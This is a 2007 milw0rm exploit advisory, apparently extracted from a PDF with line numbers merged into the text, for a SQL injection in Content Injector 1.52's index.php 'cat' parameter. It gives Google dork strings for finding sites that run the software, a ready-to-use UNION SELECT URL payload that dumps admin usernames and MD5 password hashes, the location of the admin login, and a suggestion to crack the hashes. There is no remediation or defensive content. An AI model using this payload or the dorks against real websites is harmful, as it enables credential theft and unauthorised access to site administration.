Content Injector 1.52 index.php cat Remote SQL Injection Vulnerability.pdf

1 −−==+================================================================================+==−− 2 −−==+ Content Injector V1.52 SQL Injection Vulnerbility +==−− 3 −−==+================================================================================+==−− 4 5 6 AUTHOR: S.W.A.T. 7 8 −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−−=−=−=−=−=−=−=−=−=−=−=−=−=− 9 10 Download: http://www.p3mbo.com/cinj152.zip 11 12 −=−=−=−=−=−=−−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=− 13 14 DORK (google): "Powered by Content Injector v1.52" 15 Dork2(google): Powered by Content Injector v1.52 16 17 −=−=−=−=−=−=−−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=− 18 19 DESCRIPTION: 20 You Can See Admin User & MD5 Password ..::.. Then You Can Crack It ;) 21 22 −=−=−=−=−=−=−−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=− 23 24 EXPLOITS: 25 www.site.com/index.php?cat=99999/**/union/**/select/**/1,2,username,4,5,password,7,8,9/**/from/**/users/* 26 27 −=−=−=−=−=−=−−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=− 28 29 NOTE/TIP: 30 admin login is at /admin/ 31 32 −=−=−=−=−=−=−−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=− 33 34 GREETZ: All Xmors Digital Security Team − Str0ke 35 Own Page: wWw.SvvaT.IR 36 Group Site: wWw.XmorS.CoM 37 38 39 −−==+================================================================================+==−− 40 −−==+ Content Injector V1.52 SQL Injection Vulnerbility +==−− 41 −−==+================================================================================+==−− 42 43 # milw0rm.com [2007−11−22] Page 1/1 Content Injector 1.52 index.php cat Remote SQL Injection Vulnerability S.W.A.T. 11/22/2007